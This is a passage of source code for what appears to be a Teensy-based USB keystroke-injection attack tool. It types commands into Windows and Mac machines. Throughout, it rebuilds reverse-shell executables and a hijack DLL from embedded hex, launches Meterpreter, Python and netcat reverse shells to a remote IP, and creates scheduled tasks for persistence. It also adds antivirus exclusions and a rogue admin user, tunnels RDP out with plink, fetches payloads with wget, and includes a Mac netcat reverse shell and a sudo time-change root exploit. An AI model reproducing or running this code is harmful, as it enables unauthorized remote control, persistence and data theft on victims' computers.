script will be saved/run Keyboard.println(filename); Keyboard.print(F("echo hexstr = hexstr ^& \"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); // split the hex string into an array, rebuild into a binary executable Keyboard.print(F("echo hexarr = Split(hexstr) : ")); Keyboard.print(F("ReDim binarr(Ubound(hexarr)) : ")); Keyboard.print(F("For i = 0 To Ubound(hexarr) : ")); Keyboard.print(F("binarr(i) = Chr(CInt(\"&h\" ^& hexarr(i))) : ")); Keyboard.print(F("Next : ")); Keyboard.print(F("binstr = Join(binarr, \"\") : ")); Keyboard.print(F("Set objFSO=CreateObject(\"Scripting.FileSystemObject\") : ")); // write the created executable to file Keyboard.print(F("outFile=\"")); Keyboard.print(F(win_local_target_folder)); Keyboard.print(F(win_vbscript_file_name)); Keyboard.print(F("\" : Set objFile = objFSO.CreateTextFile(outFile,True) : ")); Keyboard.print(F("objFile.Write binstr : ")); Keyboard.print("objFile.Close >> "); Keyboard.print(F(win_local_target_folder)); 
Keyboard.println(filename); // run the vbscript to create the exe delay(400); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(F(filename)); if (fromcmd) { // not using a scheduled task, run the reverse shell exe from cmd window delay(2000); Keyboard.print(F("start /B ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(win_vbscript_file_name); delay(2000); Keyboard.println("cls"); } // delete vbs file win_deleteFile(win_local_target_folder, filename); win_closeWindow(); delete(iphex); delete(porthex); } /** This function is currently not used in the sample OS script This was a recent addition to the Teensy sketch which I used to demonstrate service dll hijacking on a public kiosk It currently does not rely on any file transfer and creates the reverse tcp shell DLL via the cmd line using your pre-defined remote IP/port There are two additional function-specific parameters that must be set (dll file name and dll target folder) as these are going to vary. 
You may choose to move these to the global vars All this function does is drop the DLL in the designated folder; you can then call win_restartWS() to reboot the machine (if targeting auto-start service + DLL hijack) **/ void win_dllShell(void) { delay(1000); win_openCmd(); makeIPHex("vbscript"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' char *iphex = makeIPHex("vbscript"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' char *porthex = makePortHex("vbscript", "tcp32"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' const char *filename = "dllshell.vbs"; // name of the temporary vb script file to write to target machine const char *win_dll_file_name = "test.dll"; // name of malicious dll file to create const char *win_dll_target_folder = "C:\\temp\\"; // location to place malicious dll file delay(1000); Keyboard.print(F("echo hexstr = \"4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 ")); Keyboard.print(F("4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 1a 42 c0 3d 7b 2c 93 3d 7b 2c 93 3d 7b 2c 93 e0 84 e7 93 3e 7b ")); Keyboard.print(F("2c 93 3d 7b 2d 93 35 7b 2c 93 30 29 cc 93 3c 7b 2c 93 30 29 f2 93 3c 7b 2c 93 52 69 63 68 3d 7b 2c 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a0 0b 0d 53 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 e0 00 02 21 0b 01 0c 00 00 10 00 00 00 10 00 00 00 50 00 00 90 63 00 00 00 60 00 00 00 70 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 10 00 00 00 00 00 00 ")); Keyboard.print(F("02 00 40 05 00 00 10 00 00 10 00 00 00 00 10 
00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 70 00 00 0c 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 50 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 00 00 00 60 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 70 00 00 00 02 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 33 2e 30 38 00 55 50 58 21 0d 09 02 04 b9 59 3e b9 24 7a 1b 1f 41 42 00 00 83 03 00 00 00 14 00 00 26 00 00 54 07 33 ff ff 55 8b ec 83 ec 08 8b 45 08 89 45 f8 c7 45 fc 00 06 eb 09 ed f6 df ")); Keyboard.print(F("fe 8b 4d fc 83 c1 01 89 05 8b 55 fc 3b 55 0c 73 11 26 f8 c6 18 09 fb 8f 6c 16 f8 f8 eb de 8b e5 5d c3 cc 00 de fe b7 77 4f 81 ec 24 03 25 6a 44 8d 45 a8 50 e8 9c ff 00 83 c4 08 ac fb df dc 53 a8 44 8d 4d ec 51 8d 55 a8 52 6a ")); Keyboard.print(F("00 01 44 05 fb b7 dd 76 00 68 16 28 06 ff 15 07 10 0c 85 c0 0f 84 88 83 1b 6b 5b fb 85 dc fc 38 46 01 32 09 50 74 b3 bb 3d 76 f0 51 22 10 6a 40 31 10 00 36 08 00 f7 6d 63 37 9a ec 52 17 18 c0 fc 4c 08 1a ee a4 6b ed 00 20 18 ")); Keyboard.print(F("0e 34 ec 1c c1 6c 3b b2 f6 89 95 94 fd 48 4e 14 19 f0 40 96 6c 6c c3 04 f0 50 09 00 37 97 6e eb 92 1d 04 e8 df 51 28 0c 6c d8 b9 bb ff 83 7d fc 01 74 02 eb 05 e8 ae 4c b8 01 05 24 c2 0c 19 55 55 76 3a 00 95 8c aa 2a 88 48 46 ")); Keyboard.print(F("55 b6 ff ee 81 fc e8 89 05 60 89 e5 31 d2 64 8b 52 30 02 0c ff ff ff 5f 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 ff db ff 6f 1d 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 08 50 8b 48 18 ")); Keyboard.print(F("8b 58 20 01 d3 ff c7 62 ff e3 3c 49 8b 34 8b 01 d6 35 2f 38 e0 75 f4 03 7d f8 3b 7d 24 2e db 97 ed 75 e2 58 23 24 66 8b 0c 4b 08 1c 8b 04 f0 ff ff df 29 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 ")); Keyboard.print(F("\" > ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); delay(1000); Keyboard.print(F("echo hexstr = hexstr ^& \"6f ff ff 12 c0 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 11 29 c4 54 f6 5d b7 fd 50 68 29 80 6b 00 0f 50 00 40 01 68 ea 0f df e0 0e 6f ff 
ff ff 89 c7 68 ")); Keyboard.print(F(iphex)); // remote ip Keyboard.print(F(" 68 02 00 ")); Keyboard.print(F(porthex)); // remote port Keyboard.print(F(" 89 e6 6a 10 56 57 68 99 a5 74 61 18 68 63 ")); Keyboard.print(F("6d b7 f6 7f fb 64 00 89 e3 57 00 31 f6 6a 12 59 56 e2 fd 66 c7 70 ba 01 8d df de b6 6f 05 10 c6 00 44 50 56 00 46 56 4e 04 53 56 68 79 be fc b7 ee cc 3f 86 4b e0 0d 46 ff 30 68 08 87 1d 60 bb f0 b5 a2 ff ed 6f df 19 a6 95 bd ")); Keyboard.print(F("9d 0b 3c 06 7c 0a 80 fb cf 05 bb 47 13 72 6f 6a 00 88 6c 24 b4 53 12 49 00 be c4 bf a0 72 75 6e 64 6c 6c 74 2e 65 78 65 54 55 d9 c8 1b 00 32 aa aa 64 f6 1d 40 55 40 04 10 02 7f db a2 ff 01 43 6c 6f 73 65 48 61 0d 65 0c 45 78 ")); Keyboard.print(F("69 74 54 68 bb c3 fe f6 72 65 61 64 0b 52 65 73 75 6d 65 0d 43 06 74 65 3d d8 ed f6 50 72 6f 63 16 73 41 0f 47 65 28 43 6f 6e fe a7 64 bb 17 78 74 11 53 56 69 72 74 75 61 6c 41 6c 3f d9 5b db 62 63 59 0f 57 72 69 42 4d 65 6d ")); Keyboard.print(F("6f 72 80 6f ff b3 79 8b 87 08 23 18 0f 0e 1a 0a 00 08 00 50 45 fe c3 fe 25 55 01 04 00 a0 0b 0d 53 ab e0 00 02 21 0b 01 0c 60 f6 ac db 08 02 0c 0e 13 30 11 bf eb 62 5f 09 f1 00 10 0b 1f 06 33 59 d7 86 05 07 50 03 04 0a 4b f6 ")); Keyboard.print(F("62 b7 1e 40 05 34 2b 07 06 02 d6 8d 25 00 24 4f 28 0f 14 36 6c ca 00 40 72 00 03 36 b2 2e 34 24 13 00 2e b9 00 b6 08 32 00 52 50 bb 61 c3 82 cb b7 00 42 60 2e de 7b db c2 72 64 87 61 08 0c 27 88 27 9f ed 66 c9 ec 00 a2 40 2e ")); Keyboard.print(F("26 00 0d 08 85 3d d3 75 04 30 03 0a 0b 27 1e c1 0c db c0 4f 65 9d d3 14 eb be 29 fb 4f 12 27 42 04 70 24 8c 23 00 00 00 ee 98 04 80 04 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7c 24 08 01 0f 85 b9 01 00 00 60 be 00 ")); Keyboard.print(F("60 00 10 8d be 00 b0 ff ff 57 83 cd ff eb 0d 90 90 90 8a 06 46 88 07 47 01 db 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 00 00 00 01 db 75 07 8b 1e 83 ee fc 11 db 11 c0 01 db 73 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 31 c9 83 e8 03 ")); Keyboard.print(F("72 0d c1 e0 08 8a 06 46 83 f0 ff 74 74 89 c5 
01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 75 20 41 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 db 73 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 83 c1 02 ")); Keyboard.print(F("81 fd 00 f3 ff ff 83 d1 01 8d 14 2f 83 fd fc 76 0f 8a 02 42 88 07 47 49 75 f7 e9 63 ff ff ff 90 8b 02 83 c2 04 89 07 83 c7 04 83 e9 04 77 f1 01 cf e9 4c ff ff ff 5e 89 f7 b9 01 00 00 00 8a 07 47 2c e8 3c 01 77 f7 80 3f 00 75 ")); Keyboard.print(F("f2 8b 07 8a 5f 04 66 c1 e8 08 c1 c0 10 86 c4 29 f8 80 eb e8 01 f0 89 07 83 c7 05 88 d8 e2 d9 8d be 00 40 00 00 8b 07 09 c0 74 3c 8b 5f 04 8d 84 30 00 60 00 00 01 f3 50 83 c7 08 ff 96 28 60 00 00 95 8a 07 47 08 c0 74 dc 89 f9 ")); Keyboard.print(F("57 48 f2 ae 55 ff 96 2c 60 00 00 09 c0 74 07 89 03 83 c3 04 eb e1 61 31 c0 c2 0c 00 83 c7 04 8d 5e fc 31 c0 8a 07 47 09 c0 74 22 3c ef 77 11 01 c3 8b 03 86 c4 c1 c0 10 86 c4 01 f0 89 03 eb e2 24 0f c1 e0 10 66 8b 07 83 c7 02 ")); Keyboard.print(F("eb e2 8b ae 30 60 00 00 8d be 00 f0 ff ff bb 00 10 00 00 50 54 6a 04 53 57 ff d5 8d 87 ef 01 00 00 80 20 7f 80 60 28 7f 58 50 54 50 53 57 ff d5 58 61 8d 44 24 80 6a 00 39 c4 75 fa 83 ec 80 e9 d7 ab ff ff 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 70 00 00 28 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 70 00 00 5a 70 00 00 6a 70 00 00 7a 70 00 00 88 70 00 00 00 00 00 00 4b ")); Keyboard.print(F("45 52 4e 45 4c 33 32 2e 44 4c 4c 00 00 4c 6f 61 64 4c 69 62 
72 61 72 79 41 00 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 00 00 56 69 72 74 75 61 6c 41 6c 6c 6f 63 00 00 56 69 ")); Keyboard.print(F("72 74 75 61 6c 46 72 65 65 00 00 00 00 60 00 00 0c 00 00 00 9d 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); delay(1000); // split the hex string into an array, rebuild into a binary executable Keyboard.print(F("echo hexarr = Split(hexstr) : ")); Keyboard.print(F("ReDim binarr(Ubound(hexarr)) : ")); Keyboard.print(F("For i = 0 To Ubound(hexarr) : ")); Keyboard.print(F("binarr(i) = Chr(CInt(\"&h\" ^& hexarr(i))) : ")); Keyboard.print(F("Next : ")); Keyboard.print(F("binstr = Join(binarr, \"\") : ")); Keyboard.print(F("Set 
objFSO=CreateObject(\"Scripting.FileSystemObject\") : ")); delay(1000); // write the created executable to file Keyboard.print(F("outFile=\"")); Keyboard.print(F(win_dll_target_folder)); Keyboard.print(F(win_dll_file_name)); Keyboard.print(F("\" : Set objFile = objFSO.CreateTextFile(outFile,True) : ")); Keyboard.print(F("objFile.Write binstr : ")); Keyboard.print("objFile.Close >> "); Keyboard.print(F(win_local_target_folder)); Keyboard.println(filename); // run the vbscript to create the exe delay(400); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(F(filename)); // delete vbs file win_deleteFile(win_local_target_folder, filename); win_closeWindow(); delete(iphex); delete(porthex); } /** attempts to establish a persistent remote shell by scheduling a windows task currently only works for admin users **/ boolean win_getPersistentShell(void) { if (!flag.is_admin) { return false; // function currently only works for admin users } /** start with meterpreter shell if Win 7 **/ if (flag.is_win7) { win_persistentPowershellRevMeterpreter(); } delay(5000); /** if not connected, try python **/ if (!win_checkIfConnected()) { if (win_checkIfFile("C:\\python27\\", "python.exe")) { win_pyShell(false, NULL); // false = write to file, not to memory delay(500); win_createPythonScheduledTask("C:\\python27\\python.exe"); // create meterpreter shell recurring task as SYSTEM delay(500); } else if (win_checkIfFile("C:\\python27\\", "python.exe")){ win_pyShell(false, NULL); delay(500); win_createPythonScheduledTask("C:\\python33\\python.exe"); delay(500); } } else { return true; } delay(5000); /** if still not connected, try local vbscript Meterpreter **/ if (!win_checkIfConnected()) { // if the netcat shell connection was not successful, try the onboard shell script delay(1000); win_deleteFile(win_local_target_folder, win_python_file_name); delay(1000); win_vbscriptRevShell(false); // create and launch vbscript meterpreter shell delay(500); 
win_createVBShellScheduledTask(); // create a task for persistent shell } else { return true; } delay(5000); /** if still not connected, try downloading a Meterpreter exe **/ if (!win_checkIfConnected()) { delay(1000); win_deleteFile(win_local_target_folder, win_vbscript_file_name); delay(1000); win_fetchFile(meterpreter_remote_file); //download meterpreter exe delay(2000); win_openCmd(); delay(500); Keyboard.print(F("start /B ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(meterpreter_remote_file); // run the meterpreter shell } else { return true; } delay(5000); /** if still not connected, try a netcat shell **/ if (!win_checkIfConnected()) { // if the netcat shell connection was not successful, try the onboard shell script delay(1000); if (win_fetchFile(netcat_remote_file)) { // if successfull download of netcat via ftp or http win_createNetcatScheduledTask(); // create and launch a scheduled task netcat reverse shell } } else { return true; } } /** use this function to attempt to establish a non-persistent shell to remote machine the powershell and python shells will execute from memory which is ideal for scenarios where the user is not an Admin and AV cannot be disabled **/ boolean win_getNonPersistentShell(void) { if (flag.is_win7) { // start with meterpreter shell if Win 7 win_openPowershell(); // open a powershell prompt win_powershellRevMeterpreter(); sendKey(KEY_ENTER); //execute shell } delay(5000); sendKey(KEY_ENTER); // clear error if powershell script failed if (!win_checkIfConnected()) { // if the powershell script was not successful, try a python rev shell from memory Keyboard.println("Exit"); // exit cmd window if Powershell shell failed if (win_checkIfFile("C:\\python27\\", "python.exe")) { win_pyShell(true, "C:\\python27\\"); // true = execute from memory } else if (win_checkIfFile("C:\\python34\\", "python.exe")) { win_pyShell(true, "C:\\python34\\"); // true = execute from memory } } else { return true; } delay(5000); if 
(!win_checkIfConnected()) { // if the python shell was not successful, try a vbscript shell win_vbscriptRevShell(true); } else { return true; } delay(5000); if (!win_checkIfConnected()) { // if the python shell was not successful, try a netcat rev shell if (win_fetchFile(netcat_remote_file)) { // if successfull download of netcat via ftp or http win_manualNetcatLaunch(); // try getting non-persistent shell } } else { return true; } delay(5000); if (!win_checkIfConnected()) { return false; } else { return true; } } void win_getRDP(void) { /** Tunnel RDP back to remote machine**/ win_enableRdp(); // enable RDP and make firewall exception delay(3000); if (win_fetchFile(plink_remote_file)) { // download plink and tunnel RDP to remote machine delay(1000); win_plinkRDP(); // establish the RDP session } } /** ################################################ ############## MAC FUNCTIONS ############# ################################################ **/ /** fetch a file from remote server via wget **/ void mac_fetchFileHTTP(char *filename) { delay(200); Keyboard.print(F("wget ")); Keyboard.print(F(remote_url)); Keyboard.println(F(filename)); delay(500); } /** minimize open windows to avoid any conflicts **/ void mac_minWindows(void) { delay(200); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT); Keyboard.send_now(); Keyboard.set_key1(KEY_H); Keyboard.set_key2(KEY_M); Keyboard.send_now(); clearKeys(); } /** quit running app **/ void mac_quitApp(void) { Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_Q); Keyboard.send_now(); clearKeys(); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); clearKeys(); } /** open spotlight application to launch other apps **/ void mac_openSpotlight(void) { Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); clearKeys(); } /** open the command terminal **/ void mac_openTerminal(void) { delay(200); 
Keyboard.print("Terminal"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); clearKeys(); // cancel any processes in case terminal is already running Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.set_key1(KEY_C); Keyboard.send_now(); clearKeys(); } /** get remote shell via netcat assumes nc is installed; otherwise you can use fetch file functions to download from remote server **/ void mac_ncShell(void) { delay(1000); Keyboard.print(F("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ")); // for nc without -e Keyboard.print(remote_ip); Keyboard.print(F(" ")); Keyboard.print(remote_nc_port); Keyboard.println(F(" > /tmp/f &")); } /** get root via system time vuln in pre-Mavericks OS version **/ void mac_getRoot(void) { delay(2000); // capture current date and time and build reset script Keyboard.println("echo -n 'systemsetup -setusingnetworktime Off -settimezone ' > resettime"); Keyboard.println("echo -n $(systemsetup -gettimezone | awk -F\': \' \'{print $2}\') >> resettime"); Keyboard.println("echo -n ' -setdate ' >> resettime"); Keyboard.println("echo -n $(date +%m:%d:%Y) >> resettime"); Keyboard.println("echo -n ' -settime ' >> resettime"); Keyboard.println("echo -n $(date +%H:%M) >> resettime"); delay(2000); // change system time to get root Keyboard.println("sudo -k"); Keyboard.println("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00"); // change system time for exploit Keyboard.println("sudo su"); delay(2000); // execute netcat reverse shell as root (if exploit worked) mac_ncShell(); delay(2000); // reset the system date/time to original value Keyboard.println("chmod 777 resettime"); Keyboard.println("./resettime"); delay(500); Keyboard.println("rm resettime"); // delete script file } /** ################################################ ############### OS SCRIPTS ############## ################################################ Scripts for each OS to run the available OS-specific functions 
################################################ **/ /** the mac script **/ void mac_script(void) { delay(500); /** minimize active windows **/ mac_minWindows(); // I've noticed on some Macs that if there are a lot of windows open, the first minimize mac_minWindows(); // sometimes leaves a stray window open which is why it's done twice here /** open terminal, get root, and open a nc rev shell **/ delay(500); mac_openSpotlight(); // here I use spotlight to open Terminal as hot keys can vary mac_openTerminal(); delay(2000); Keyboard.println("cd /tmp"); // work out of the /tmp directory delay(2000); mac_getRoot(); // attempt to get root on system (works on pre-Mavericks only) delay(300); Keyboard.println("exit"); mac_quitApp(); } /** the windows script **/ void win_script(void) { boolean gotshell = false; wait_for_drivers(); // wait until device is loaded win_minWindows(); // minimize any open windows win_createFolder(win_local_target_folder); // create a folder for saving files/scripts; path set in config section delay(1000); /** perform admin functions if applicable **/ if (win_checkIfAdmin()) { /** configure firewall rule to allow ftp **/ win_firewallProgramRule("c:\\windows\\system32\\ftp.exe", "ftpallow"); /** check for the presence of AV and create a scanning folder exception **/ win_avException(); /** add user with admin privs **/ win_addUser(local_user, local_pass); } delay(2000); /** get reverse shell/RDP **/ if (flag.persist) { gotshell = win_getPersistentShell(); // first try persistent shell methods (admin only) } delay(2000); if (!gotshell) { if (!win_getNonPersistentShell()) {; // try non-persistent if (flag.is_admin) { delay(1000); win_getRDP(); // if we still can't get a shell and we're admin, try RDP } } } /** grab files of interest -- files defined in global vars section **/ delay(2000); size_t i=0; for (i=0; i